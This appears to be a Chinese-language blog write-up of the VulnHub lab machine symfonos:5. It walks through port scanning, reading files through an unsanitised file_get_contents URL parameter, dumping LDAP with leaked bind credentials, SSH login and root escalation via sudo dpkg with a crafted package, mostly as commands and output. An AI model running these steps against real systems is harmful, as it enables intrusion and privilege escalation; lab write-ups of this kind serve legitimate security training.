VulnHub symfonos5 靶机过程

  • by
Name: symfonos: 5
Date release: 7 Jan 2020
IP: 192.168.31.65

端口

root@kali:~# nmap 192.168.31.65 -p- --ope
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:12 HKT
Nmap scan report for 192.168.31.65
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap
636/tcp open  ldapssl
MAC Address: 00:0C:29:CE:78:46 (VMware)

80端口目录扫描

访问/home.php会自动跳转,Burp查看响应包,发现/home.php?url=http://127.0.0.1/portraits.php

尝试/home.php?url=file:///etc/passwd成功后,一直试着用file:///读取文件,一直过不去,直到同事告诉我不用file一样可以读。

所以不要轻易认定一个点一定是某个漏洞,不然就会死在里面,思维应该跳出来才对。

通过/home.php?url=home.php得知源码是这样的

<?php
session_start();

if(!isset($_SESSION['loggedin'])){
   header("Location: admin.php");
}

if (!empty($_GET["url"]))
{
$r = $_GET["url"];
$result = file_get_contents($r);
}

?>

现在简单了,继续看看其他文件,读取到admin.php发现ldap连接代码,包含配置信息

kali自带的ldapsearch和nmap的ldap-search脚本都可以读取,这里使用nmap的脚本

root@kali:~# nmap -p 389 192.168.31.65 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local",ldap.password="qMDdyZh3cT6eeAWD"'

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:09 HKT
Nmap scan report for 192.168.31.65
Host is up (0.00045s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=symfonos,dc=local
|     dn: dc=symfonos,dc=local
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: symfonos
|         dc: symfonos
|     dn: cn=admin,dc=symfonos,dc=local
|         objectClass: simpleSecurityObject
|         objectClass: organizationalRole
|         cn: admin
|         description: LDAP administrator
|         userPassword: {SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
|     dn: uid=zeus,dc=symfonos,dc=local
|         uid: zeus
|         cn: zeus
|         sn: 3
|         objectClass: top
|         objectClass: posixAccount
|         objectClass: inetOrgPerson
|         loginShell: /bin/bash
|         homeDirectory: /home/zeus
|         uidNumber: 14583102
|         gidNumber: 14564100
|         userPassword: cetkKf4wCuHC9FET
|         mail: zeus@symfonos.local
|_        gecos: Zeus User
MAC Address: 00:0C:29:CE:78:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

得到用户zeus和密码cetkKf4wCuHC9FET,SSH登录成功

zeus@symfonos5:~$ whoami
zeus

zeus@symfonos5:~$ lastlog 
Username         Port     From             Latest
root             pts/0    192.168.65.128   Mon Jan  6 17:24:21 -0600 2020
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
nobody                                     **Never logged in**
_apt                                       **Never logged in**
systemd-timesync                           **Never logged in**
systemd-network                            **Never logged in**
systemd-resolve                            **Never logged in**
messagebus                                 **Never logged in**
sshd                                       **Never logged in**
zeus             pts/0    192.168.31.249   Sat Feb 15 00:35:36 -0600 2020
systemd-coredump                           **Never logged in**

查看sudo范围

zeus@symfonos5:~$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg

dpkg是NOPASSWD,那么看看dpkg怎么提权

本地安装fpm后编译deb包,scp传到靶机上就可以越权啦

root@kali:~# gem install --no-document fpm
...

root@kali:~# fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
root@kali:~# scp x_1.0_all.deb zeus@192.168.31.65:/home/zeus/
zeus@192.168.31.65's password: 
x_1.0_all.deb                                                        100% 1110     1.7MB/s   00:00 
zeus@symfonos5:~$ ls
ame_1.0_amd64.deb  x_1.0_all.deb

zeus@symfonos5:~$ sudo dpkg -i x_1.0_all.deb 
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# whoami
root
# 

发表评论

电子邮件地址不会被公开。 必填项已用*标注